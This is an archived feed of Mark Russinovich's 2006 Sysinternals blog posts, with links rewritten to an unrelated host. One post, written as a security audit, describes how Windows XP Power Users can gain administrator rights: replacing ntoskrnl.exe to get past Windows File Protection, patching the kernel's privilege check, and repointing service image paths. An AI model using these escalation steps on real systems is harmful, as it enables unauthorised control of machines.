https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-process-startup-delays/ba-p/723526 MarkRussinovich 2019-06-27T06:28:53Z My Blog Has Moved https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/my-blog-has-moved/ba-p/723525 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 31, 2006 </STRONG> <BR /> <DIV style="CLEAR: both"> <P> My blog has moved to its <A href="#" mce_href="#" target="_blank"> new home </A> at Microsoft TechNet blogs where you'll find my current post, The Case of the Process Startup Delays. <BR /> </P> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 8/31/2006 11:55:00 AM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> </DIV> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:28:37 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/my-blog-has-moved/ba-p/723525 TechCommunityAPIAdmin 2019-06-27T06:28:37Z The First Week https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-first-week/ba-p/723524 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 31, 2006 </STRONG> <BR /> <P> First I want to thank the many people that have sent me warm wishes on my move to Microsoft directly and via comments on my last blog post. I didn’t make it clear, but both Bryce and I have relocated to Microsoft’s Redmond campus and I’ve just finished my first week as a Microsoft employee. <BR /> <BR /> The week started with a day and of half New Employee Orientation (NEO), which Bryce and I attended with 180 or so other new hires. The attendees included people from all over the US and the world, including the Netherlands, Germany, China, and India. All of Microsoft’s groups, such as legal, finance, and of course development, were represented, as were all levels in the organizational hierarchy. <BR /> <BR /> NEO starts with an overview of Microsoft’s mission statement (to help people reach their full potential) and an introduction to Microsoft’s various divisions and senior leaders. The second part of day one concentrates on human relations (HR) topics like employee diversity and interest groups, payroll and benefits. The morning of day two is entirely occupied with legal information, like the importance of security, definitions of patents, copyright, trademark, and trade secrets. <BR /> <BR /> The amount of factual information delivered could probably fit in a two-hour presentation, but there is a heavy emphasis on Microsoft’s culture threaded through every module. I was impressed by the conveyed importance of diversity, Microsoft’s encouragement on giving to the community through matching contributions, and most surprisingly, the effort to cooperate with customers and partners and to promote a positive image of Microsoft both locally and globally. Nevertheless, I was familiar with much of the information through my many interactions with Microsoft throughout the last 10 years and so was a bit bored. <BR /> <BR /> With NEO behind me I spent the rest of the week meeting with many different people in the core operating systems division (COSD) and attending various meetings. For the near future I’ll be working with the client performance team analyzing and addressing Vista performance issues. While features such as <A href="#" mce_href="#" target="_blank"> Superfetch </A> , a scenario-based memory management system, and I/O prioritization help to improve the performance of the operating system from an end-user perspective, the addition of constant search indexing, the side bar with its gadgets, the defragmenter, and regular volume snapshots all conspire to erode their gains. <BR /> <BR /> Comprehensive performance instrumentation of everything from disk I/Os to context switches and hard page faults is active on all Vista builds deployed internally and end-users can simply open a desktop shortcut to submit a trace of any sluggish system behavior they experience. The team’s job is to determine the cause of the behavior and make recommendations to other teams for improving their design or avoid multi-component interactions that lead to pathologic situations. <BR /> <BR /> The performance team consists of some amazingly talented people and the tools they’ve developed internally for visualizing and exploring the trace data provide a powerful view into the minutest details of the system’s operation. I’m having fun using them to look at what happens when I do something as simple as open the start menu and I hope to show them in an upcoming blog post. <BR /> <BR /> One of the most frustrating aspects of the first week is that I still have no working Microsoft email account. For apparently legal reasons Microsoft doesn’t create an email account until the first day of employment, and after that everyone is resigned to the fact that “it takes a while for information to propagate through the system”. In my case, I didn’t fill out a form on the first day because I didn’t have two forms of ID with me, and I didn’t realize that it would hold up a bunch of things. Once I found that it was holding things up on Wednesday, I got it turned in it looks like things are moving and I’m hopeful that the email will start working. I just wonder if all the emails that people have sent to the account will be sitting there waiting for me when I access it. <BR /> <BR /> Probably of most importance, however, is the outcome of the various meetings I’ve had with the Sysinternals/Winternals integration team. I’m pleased to report that Microsoft’s number one priority is not only keeping the tools freely available, but preserving the Sysinternals community including the newsletter, the forums, and my blog. While we’re still brainstorming how to make this successful in the long term, I’m pleased to announce the first step in the transition, which is the introduction of a new <A href="#" mce_href="#" target="_blank"> Sysinternals EULA </A> , that I believe is even more permissive than the EULA in place before the Microsoft acquisition, since it allows for wider use of Sysinternals utilities within a company. <BR /> <BR /> In the near future, the next step will probably be to move the tools to the Microsoft download center, which will increase download capacity. (No, they won’t be wrapped in .MSI files). I, and Microsoft, believe that this also demonstrates Microsoft’s commitment to keep the tools freely available. I’ll keep you posted as the rest of the transition plan unfolds, but rest assured that Sysinternals, though it might end up looking different, is here to stay. <BR /> </P> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 7/31/2006 10:33:00 PM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:28:33 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-first-week/ba-p/723524 TechCommunityAPIAdmin 2019-06-27T06:28:33Z On My Way to Microsoft! https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/on-my-way-to-microsoft/ba-p/723523 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 18, 2006 </STRONG> <BR /> <P> I’m very pleased to announce that <A href="#" mce_href="#" target="_blank"> Microsoft has acquired Winternals Software </A> and Sysinternals. Bryce Cogswell and I founded both Winternals and Sysinternals (originally NTInternals) back in 1996 with the goal of developing advanced technologies for Windows. We’ve had an incredible amount of fun over the last ten years working on a wide range of diverse products such as Winternals Administrator’s Pak, Protection Manager, Defrag Manager, and Recovery Manager, and the dozens of Sysinternals tools, including Filemon, Regmon and Process Explorer, that millions of people use every day for systems troubleshooting and management. There’s nothing more satisfying for me than to see our ideas and their implementation have a positive impact. <BR /> <BR /> That’s what makes being acquired by Microsoft especially exciting and rewarding. I’m joining Microsoft as a technical fellow in the Platform and Services Division, which is the division that includes the Core Operating Systems Division, Windows Client and Windows Live, and Windows Server and Tools. I’ll therefore be working on challenging projects that span the entire Windows product line and directly influence subsequent generations of the most important operating system on the planet. From security to virtualization to performance to a more manageable application model, there’s no end of interesting areas to explore and innovate. <BR /> <BR /> So what’s going to happen to Winternals and Sysinternals? Microsoft is still evaluating the best way to leverage the many different technologies that have been developed by Winternals. Some will find their ways into existing Microsoft products or Windows itself and others will continue on as Microsoft-branded products. As for Sysinternals, the site will remain for the time being while Microsoft determines the best way to integrate it into its own community efforts, and the tools will continue to be free to download. <BR /> <BR /> Personally, I remain committed to the Sysinternals and Windows IT pro communities and so I’ll continue to blog here, to write about Windows technologies, and to speak at conferences. Until I know my Microsoft email address and post it you can continue to contact me at <A href="https://gorovian.000webhostapp.com/?exam=mailto:mark@sysinternals.com" mce_href="https://gorovian.000webhostapp.com/?exam=mailto:mark@sysinternals.com" target="_blank"> mark@sysinternals.com </A> . <BR /> <BR /> I’m looking forward to making Windows an even better platform for all of us! <BR /> </P> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 7/18/2006 10:20:00 AM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:28:28 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/on-my-way-to-microsoft/ba-p/723523 TechCommunityAPIAdmin 2019-06-27T06:28:28Z The Power in Power Users https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-power-in-power-users/ba-p/723522 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 01, 2006 </STRONG> <BR /> <DIV style="CLEAR: both"> </DIV> Placing Windows user accounts in the Power Users security group is a common approach IT organizations take to get users into a least-privilege environment while avoiding the many pains of truly running as a limited user. The <A href="#" mce_href="#" target="_blank"> Power Users group </A> is able to install software, manage power and time-zone settings, and install ActiveX controls, actions that limited Users are denied. <BR /> <BR /> What many administrators fail to realize, however, is that this power comes at the price of true limited-user security. Many articles, including this Microsoft Knowledge Base <A href="#" mce_href="#" target="_blank"> article </A> and this <A href="#" mce_href="#" target="_blank"> blog post </A> by Microsoft security specialist Jesper Johansen, point out that a user that belongs to the Power Users group can easily elevate themselves to fully-privileged administrators, but I was unable to find a detailed description of the elevation mechanisms they refer to. I therefore decided to investigate. <BR /> <BR /> Before I could start the investigation, I had to define the problem. In the absence of a security flaw such as a buffer overflow privilege escalation is possible only if an account can configure arbitrary code to execute in the context of a more-privileged account. The default accounts that have more privilege than Power Users include Administrators and the Local System account, in which several Windows service processes run. Thus, if a Power Users member can modify a file executed by one of these accounts, configure one of their executables to load an arbitrary DLL, or add an executable auto-start to these accounts, they can obtain full administrative privileges. <BR /> <BR /> My first step was to see what files and directories to which the Power Users group has write access, but that limited users do not. The systems I considered were stock Windows 2000 Professional SP4, Windows XP SP2, and Windows Vista. I'm not going to bother looking at server systems because the most common Power Users scenario is on a workstation. <BR /> <BR /> The brute force method of seeing what file system objects Power Users can modify requires visiting each file and directory and examining its permissions, something that’s clearly not practical. The command-line Cacls utility that Windows includes dumps security descriptors, but I’ve never bothered learning Security Descriptor Description Language (SDDL) and parsing the output would require writing a script. The <A href="#" mce_href="#" target="_blank"> AccessEnum </A> utility that Bryce wrote seemed promising and it can also look at Registry security, but it’s aimed at showing potential permissions weaknesses, not the accesses available to particular accounts. Further, I knew that I’d also need to examine the security applied to Windows services. <BR /> <BR /> I concluded that I had to write a new utility for the job, so I created <A href="#" mce_href="#" target="_blank"> AccessChk </A> . You pass AccessChk an account or group name and a file system path, Registry key, or Windows service name, and it reports the effective accesses the account or group has for the object, taking into consideration the account’s group memberships. For example, if the Mark account had access to a file, but Mark belongs to the Developers group that is explicitly denied access, then AccessChk would show Mark as having no access. <BR /> <BR /> In order to make the output easy to read AccessChk prints ‘W’ next to the object name if an account has any permissions that would allow it to modify an object, and ‘R’ if an account can read the object’s data or status. Various switches cause AccessChk to recurse into subdirectories or Registry subkeys and the –v switch has it report the specific accesses available to the account. A switch I added specifically to seek out objects for which an account has write access is –w. <BR /> <BR /> Armed with this new tool I was ready to start investigating. My first target was a Windows XP SP2 VMWare installation that has no installed applications other than the VMWare Tools. The first command I executed was: <BR /> <BR /> <SPAN style="FONT-FAMILY: courier new"> accesschk –ws “power users” c:\windows </SPAN> <BR /> <BR /> This shows all the files and directories under the \Windows directory that the Power Users group can modify. Of course, many of the files under \Windows are part of the operating system or Windows services and therefore execute in the Local System account. AccessChk reported that Power Users can modify most of the directories under \Windows, which allows member users to create files in those directories. Thus, a member of the Power Users group can create files in the \Windows and \Windows\System32 directory, which is a common requirement of poorly written legacy applications. In addition, Power Users needs to be able to create files in the \Windows\Downloaded Program Files directory so that they can install ActiveX controls, since Internet Explorer saves them to that directory. However, simply creating a file in these directories is not a path to privilege elevation. <BR /> <BR /> Despite the fact that Power Users can create files underneath \Windows and most of its subdirectories, Windows configures default security permissions on most files contained in these directories so that only members of the Administrators group and the Local System account have write access. Exceptions include the font files (.fon), many system log files (.log), some help files (.chm), pictures and audio clips (.jpg, .gif, and .wmv) and installation files (.inf), but none of these files can be modified or replaced to gain administrative privilege. The device drivers in \Windows\System32\Drivers would allow easy escalation, but Power Users doesn’t have write access to any of them. <BR /> <BR /> I did see a number of .exe’s and .dll’s in the list, though, so I examined them for possible exploits. Most of the executables for which Power Users has write access are interactive utilities or run with reduced privileges. Unless you can trick an administrator into logging into the system interactively, these can’t be used to elevate. But there’s one glaring exception: ntoskrnl.exe: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482398/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482398/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120937i7825F7116341EAF4" /> <BR /> <BR /> That’s right, Power Users can replace or modify Windows’ core operating system file. Five seconds after the file is modified, however, Windows File Protection (WFP) will replace it with a backup copy it retrieves, in most cases, from \Windows\System32\Dllcache. Power Users doesn’t have write access to files in Dllcache so it can’t subvert the backup copy. But members of the Power Users group can circumvent WFP by writing a simple program that replaces the file, flushes the modified data to disk, then reboots the system before WFP takes action. <BR /> <BR /> I verified that this approach works, but the question remained of how this vulnerability can be used to elevate privilege. The answer is as easy as using a disassembler to find the function that Windows uses for privilege checks, <A href="#" mce_href="#" target="_blank"> SeSinglePrivilegeCheck </A> , and patching its entry point in the on-disk image so that it always returns TRUE, which is the result code that indicates that a user has the privilege being checked for. Once a user is running on a kernel modified in this manner they will appear to have all privileges, including Load Driver, Take Ownership, and Create Token, to name just a few of the privileges that they can easily leverage to take full administrative control of a system. Although 64-bit Windows XP prevents kernel tampering with <A href="#" mce_href="#" target="_blank"> PatchGuard </A> , few enterprises are running on 64-bit Windows. <BR /> <BR /> Replacing Ntoksrnl.exe isn’t the only way to punch through to administrative privilege via the \Windows directory, however. At least one of the DLLs for which default permissions allow modification by Power User, Schedsvc.dll, runs as a Windows service in the Local System account. Schedsvc.dll is the DLL that implements the Windows Task Scheduler service. Windows can operate successfully without the service so Power Users can replace the DLL with an arbitrary DLL, such as one that simply adds their account to the Local Administrators group. Of course, WFP protects this file as well so replacing it requires the use of the WFP-bypass technique I’ve described. <BR /> <BR /> I’d already identified several elevation vectors, but continued my investigation by looking at Power Users access to the \Program Files directory where I found default permissions similar to those in the \Windows directory. Power Users can create subdirectories under \Program Files, but can’t modify most of the preinstalled Windows components. Again, the exceptions, like Windows Messenger (\Program Files\Messenger\Msmgs.exe) and Windows Media Player (\Program Files\Windows Media Player\Wmplayer.exe) run interactively. <BR /> <BR /> That doesn’t mean that \Program Files doesn’t have potential holes. When I examined the most recent output I saw that Power Users can modify any file or directory created in \Program Files subsequent to those created during the base Windows install. On my test system \Program Files\Vmware\Vmware Tools\Vmwareservice.exe, the image file for the Vmware Windows service that runs in the Local System account, was such a file. Another somewhat ironic example is Microsoft Windows Defender Beta 2, which installs its service executable in \Program Files\Windows Defender with default security settings. Replacing these service image files is a quick path to administrator privilege and is even easier than replacing files in the \Windows directory because WFP doesn’t meddle with replacements. <BR /> <BR /> Next I turned my attention to the Registry by running this command: <BR /> <BR /> <SPAN style="FONT-FAMILY: courier new"> accesschk –swk “power users” hklm </SPAN> <BR /> <BR /> The output list was enormous because Power Users has write access to the vast majority of the HKLM\Software key. The first area I studied for possible elevations was the HKLM\System key, because write access to many settings beneath it, such as the Windows service and driver configuration keys in HKLM\System\CurrentControlSet\Services, would permit trivial subversion of the Local System account. The analysis revealed that Power Users doesn’t have write access to anything significant under that key. <BR /> <BR /> Most of the Power Users-writeable areas under the other major branch of HKLM, Software, related to Internet Explorer, Explorer and its file associations, and power management configuration. Power Users also has write access to HKLM\Software\Microsoft\Windows\CurrentVersion\Run, allowing them to configure arbitrary executables to run whenever someone logs on interactively, but exploiting this requires a user with administrative privilege to log onto the system interactively (which, depending on the system, may never happen, or happen infrequently). And just as for the \Program Files directory, Power Users has default write access to non-Windows subkeys of HKLM\Software, meaning that third-party applications that configure executable code paths in their system-wide Registry keys could open security holes. VMWare, the only application installed on the system, did not. <BR /> <BR /> The remaining area of exploration was Windows services. The only service permissions AccessChk considers to be write accesses are SERVICE_CHANGE_CONFIG and WRITE_DAC. A user with SERVICE_CHANGE_CONFIG can configure an arbitrary executable to launch when a service starts and given WRITE_DAC they can modify the permissions on a service to grant themselves SERVICE_CHANGE_CONFIG access. AccessChk revealed the following on my stock Windows XP SP2 system: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482399/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482399/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120938i2BA655596A084A53" /> <BR /> <BR /> I next ran <A href="#" mce_href="#" target="_blank"> PsService </A> to see the account in which the DcomLaunch service executes: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482400/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482400/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120939i63A1C3818C29AA76" /> <BR /> <BR /> Thus, members of the Power Users group can simply change the image path of DComLauncher to point at their own image, reboot the system, and enjoy administrative privileges. <BR /> <BR /> There can potentially be other services that introduce exploits in their security. The default permissions Windows sets on services created by third-party applications do not allow Power Users write access, but some third party applications might configure custom permissions to allow them to do so. In fact, on my production 64-bit Windows XP installation AccessChk reveals a hole that not only Power Users can use to elevate themselves, but that limited users can as well: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482401/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482401/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120940i0564C9B104B7018A" /> <BR /> <BR /> I’d now finished the major phase of my investigation and just confirmed what everyone has been saying: a determined member of the Power Users group can fairly easily make themselves full administrator using exploits in the operating system and ones created by third-party applications. <BR /> <BR /> My final step was to see how Microsoft’s approach to the Power Users account has evolved over time. This 1999 Microsoft Knowledge Base <A href="#" mce_href="#" target="_blank"> article </A> documents the famous screen-saver elevation vulnerability that existed on Windows NT 4, but Microsoft closed that hole before the release of Windows 2000. The KB article also shows that Microsoft was apparently unaware of other vulnerabilities that likely existed. Windows 2000 SP4 also includes holes, but is actually slightly more secure than the default Windows XP SP2 configuration: Power Users don’t have write access to Ntoskrnl.exe or the Task Scheduler image file, but instead of write-access to the DComLauncher service they can subvert the WMI service, which also runs in the Local System account. <BR /> <BR /> Windows XP SP1 added more Power Users weaknesses, including write access to critical system files like Svchost.exe, the Windows service hosting process, and additional services, WMI and SSDPSRV, with exploitable permissions. Several services even allowed limited users to elevate as described in this Microsoft KB <A href="#" mce_href="#" target="_blank"> article </A> from March of this year. <BR /> <BR /> Microsoft’s newest operating system, Windows Vista, closes down all the vulnerabilities I’ve described by neutering Power Users so that it behaves identically to limited Users. Microsoft has thus closed the door on Power Users in order to force IT staffs into securing their systems by moving users into limited Users accounts or into administrative accounts where they must acknowledge end-user control over their systems. <BR /> <BR /> The bottom line is that while Microsoft could fix the vulnerabilities I found in my investigation, they can’t prevent third-party applications from introducing new ones while at the same time preserving the ability of Power Users to install applications and ActiveX controls. The lesson is that as an IT administrator you shouldn’t fool yourself into thinking that the Power Users group is a secure compromise on the way to running as limited user. <BR /> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 5/1/2006 11:01:00 AM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:28:24 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-power-in-power-users/ba-p/723522 TechCommunityAPIAdmin 2019-06-27T06:28:24Z Why Winternals Sued Best Buy https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/why-winternals-sued-best-buy/ba-p/723517 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 21, 2006 </STRONG> <BR /> <P> This post I’m taking a break from my standard technical postings to discuss a disturbing discovery regarding a large corporation’s unauthorized software usage. By now many of you have heard via <A href="#" mce_href="#" target="_blank"> Slashdot </A> , <A href="#" mce_href="#" target="_blank"> arstechnica </A> , <A href="#" mce_href="#" target="_blank"> Digg </A> , or your local newspaper that <A href="#" mce_href="#" target="_blank"> Winternals Software </A> , the company I co-founded with Bryce Cogswell in 1996, <A href="#" mce_href="#" target="_blank"> filed suit </A> in Federal court against Geek Squad and Best Buy for illegal use of the Administrator’s Pak. What the press coverage to date might not have made clear is what Geek Squad and Best Buy did prior to approaching Winternals in October 2005 about a license to our software, what they continued to do after terminating licensing discussions in February 2006, and why we felt we had no alternative but to protect our software through the legal system. This is the first lawsuit Winternals has ever initiated, and we did not approach the decision lightly. <BR /> <BR /> Best Buy acquired the Geek Squad several years ago and has grown the unit to a size of approximately 12,000 employees that analysts estimate will generate over a billion dollars of revenue this year alone. The Geek Squad provides system repair, data salvaging, and installation services in each of the Best Buy retail outlets and, for an additional significant fee, a 911 service that travels to customer homes to perform repairs on site. <BR /> <BR /> The <A href="#" mce_href="#" target="_blank"> Administrator’s Pak </A> is a collection of powerful system utilities, including enhanced versions of Sysinternals Filemon and Regmon that work remotely and have log-to-file capability, that’s sold to individual systems administrators. The flagship tool is ERD Commander, a <A href="#" mce_href="#" target="_blank"> Windows Preinstallation Environment </A> (WinPE)-based recovery environment with a familiar Windows user-interface that is the latest generation of the original ERD Commander product we released in 1998 and upon which Winternals was built. While Windows includes a rudimentary unbootable system repair tool in the form of the Recovery Console, Microsoft has chosen not to provide an advanced unbootable system repair, diagnosis and recovery environment on par with ERD Commander. The BartPE freeware alternative that clones WinPE offers some of the functionality as ERD Commander, but is missing key features such as the System Restore Wizard, hotfix and Service Pack uninstaller, password changer, crash analyzer wizard, and integrated Registry editor. <BR /> <BR /> As outlined in our Complaint and Motion for Temporary Restraining Order (which can be found, along with all other legal documents filed in the case, at <A href="#" mce_href="#" target="_blank"> http://www.winternals.com/legal/ </A> ), Best Buy and Geek Squad initially contacted us and said that a license was needed to come into compliance. Rather than focus on the degree to which Best Buy and Geek Squad had previously engaged in the unauthorized copying and use of our products, we entered negotiations for a software license and to establish a long-term business relationship. To educate their employees on the software and facilitate these negotiations, we even held a training session at our expense on the Administrator's Pak at their facilities in Minneapolis and offered an eminently reasonable software license for all Geek Squad employees. While surprised that they ultimately decided against a license, we were willing to go our separate way with the hope that they would someday change their mind. <BR /> <BR /> However, after receiving information that Geek Squad employees continued to use ERD Commander frequently in repairing customers' computers we decided to investigate the situation on our own. The level of unauthorized copying and usage we’ve uncovered in our preliminary investigation is substantial and has apparently taken place over several years. Our evidence includes admissions by highly-placed current Geek Squad and Best Buy employees and interviews of many former employees. As alleged in the Complaint, we also found that Geek Squad employees across the country were still using unlicensed copies of our software to repair computers. <BR /> <BR /> In the end we concluded that the only remaining option was to take legal action. Winternals has invested substantial time and capital in developing this software and believes that Geek Squad should not be permitted to allow its 12,000 employees to use unlicensed copies for free while generating substantial profits from those efforts. Our <A href="#" mce_href="#" target="_blank"> press release </A> provides a summary of the lawsuit and the court's action to date. <BR /> </P> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 4/21/2006 9:28:00 AM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:27:52 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/why-winternals-sued-best-buy/ba-p/723517 TechCommunityAPIAdmin 2019-06-27T06:27:52Z The Case of the Mysterious Driver https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-driver/ba-p/723516 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 27, 2006 </STRONG> <BR /> <DIV style="CLEAR: both"> </DIV> The other day I used <A href="#" mce_href="#" target="_blank"> Process Explorer </A> to examine the drivers loaded on a home system to see if I’d picked up any Sony or <A href="#" mce_href="#" target="_blank"> Starforce </A> -like digital rights management (DRM) device drivers. The DLL view of the System process, which reports the currently loaded drivers and kernel-mode modules (such as the Hardware Abstraction Layer – HAL), listed mostly Microsoft operating system drivers and drivers associated with the DVD burning software I have installed, but one entry, Asctrm.sys caught my attention because its company information is “Windows (R) 2000 DDK provider”: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482390/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482390/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120934iB76FBD6D806CFBDC" /> <BR /> <BR /> This is the company name included in the version information of drivers that have been based on sample code from the Windows 2000 Device Driver Kit (DDK) and it’s obviously unusual to see it in production images. The driver’s description is equally unenlightening: “TR Manager”. My suspicions aroused, I set about investigating. <BR /> <BR /> My first step was to right-click on the entry and “Google” the driver image name. The resulting <A href="#" mce_href="#" target="_blank"> Google search </A> reveals that others have this driver and that in some cases it had been identified as the cause of system crashes, but although several spyware databases have entries for it, none of the ones I checked conclusively tied the driver with an application or vendor. <BR /> <BR /> I next looked for clues in the image itself by double-clicking on the driver entry in the DLL view to open the Process Explorer DLL properties dialog. The image page revealed nothing of interest other than the fact that the driver had been linked in December of 2004. I turned my attention to the Strings tab to look for some hint as to the driver’s reason for existence. None of the few intelligible strings Process Explorer found in the image were unique except for the last one: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482391/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482391/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120935i6ADA9FA750F62DD1" /> <BR /> <BR /> When a driver compiles the linker stores the path to the debug information file it generates, which has the extension .pdb, in the image. The path in this case appears to include the name of a company, “AegiSoft”. However, the <A href="#" mce_href="#" target="_blank"> http://www.aegisoft.com/ </A> web site describes Aegis Software, Inc. as a company that creates “powerful, sophisticated and easy to use trading software and services for financial companies that demand performance, robustness, availability, and flexibility.” That doesn’t sound like a company that ships device drivers. <BR /> <BR /> On a whim I did a Google search of “aegis” and came across <A href="#" mce_href="#" target="_blank"> this January 2001 news item </A> announcing RealNetworks’ acquisition of Aegisoft Corp. (notice the difference in name from Aegis Software, Inc.). I knew I had RealPlayer installed on the system so I ran RealPlayer and confirmed that it uses the driver by doing a handle search for “asctrm”, the name of the device object I had seen in one of the driver’s strings: <BR /> <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482392/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482392/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120936iF36D01EB1F096AB7" /> <BR /> <BR /> Newer versions of RealPlayer don’t appear to include a device driver, but I have an old version on this system. I haven't gotten new release notifications because after installing RealPlayer I always use Autoruns to delete the HKLM\Software\Microsoft\Windows\CurrentVersion\Run item that the RealPlayer setup creates to launch the Real Networks Scheduler at each boot. That Run entry, incidentally, is “TkBellExe”, another misleading label. <BR /> <BR /> So the driver is not malicious after all (but is related to DRM, so agreement with that view depends on your feelings about DRM), however this example highlights the need for all software vendors (Microsoft included!) to clearly identify their applications and drivers in their version resources and in any associated Registry keys or values. <BR /> <BR /> I’m still researching Vista User Account Control and so will blog on that in the near future. <BR /> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 3/27/2006 3:52:00 PM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:27:48 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-driver/ba-p/723516 TechCommunityAPIAdmin 2019-06-27T06:27:48Z Running as Limited User - the Easy Way https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/running-as-limited-user-the-easy-way/ba-p/723506 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 02, 2006 </STRONG> <BR /> Malware has grown to epidemic proportions in the last few years. Despite applying layered security principles, including running antivirus, antispyware, and a firewall, even a careful user can fall victim to malware. Malware-infected downloads, drive-by exploits of Internet Explorer (IE) vulnerabilities, and a careless click on an Outlook attachment sent by a friend can render a system unusable and lead to several hours with the Windows setup CD and application installers. <BR /> <BR /> As <A href="#" mce_href="#" target="_blank"> this eWeek study </A> shows, one of the most effective ways to keep a system free from malware and to avoid reinstalls even if malware happens to sneak by, is to run as a limited user (a member of the Windows Users group). The vast majority of Windows users run as members of the Administrators group simply because so many operations, such as installing software and printers, changing power settings, and changing the time zone require administrator rights. Further, many applications fail when run in a limited-user account because they’re poorly written and expect to have write access to directories such as \Program Files and \Windows or registry keys under HKLM\Software. <BR /> <BR /> An alternative to running as limited user is to instead run only specific Internet-facing applications as a limited user that are at greater risk of compromise, such as IE and Outlook. Microsoft promises this capability in Windows Vista with <A href="#" mce_href="#" target="_blank"> Protected-Mode IE </A> and User Account Control (UAC), but you can achieve a form of this today on Windows 2000 and higher with the new limited user execution features of Process Explorer and PsExec. <BR /> <BR /> Process Explorer’s Run as Limited User menu item in the File menu opens a dialog that looks like and acts like the standard Windows Run dialog, but that runs the target process without administrative privileges: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482370/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482370/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120931i164A5B57B9C3D435" /> <BR /> <BR /> PsExec with the –l switch accomplishes the same thing from the command line: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482371/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482371/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120932i1107318A68C3BA50" /> <BR /> <BR /> An advantage to using PsExec to launch limited-user processes is that you can create PsExec desktop shortcuts for ones you commonly launch. To make a shortcut for Outlook, for example, right-click on the desktop, choose New-&gt;Shortcut, enter the path to PsExec in the location field and click Next. Enter Outlook as the name of the shortcut and press Finish. Then right click on the shortcut to open its properties, add 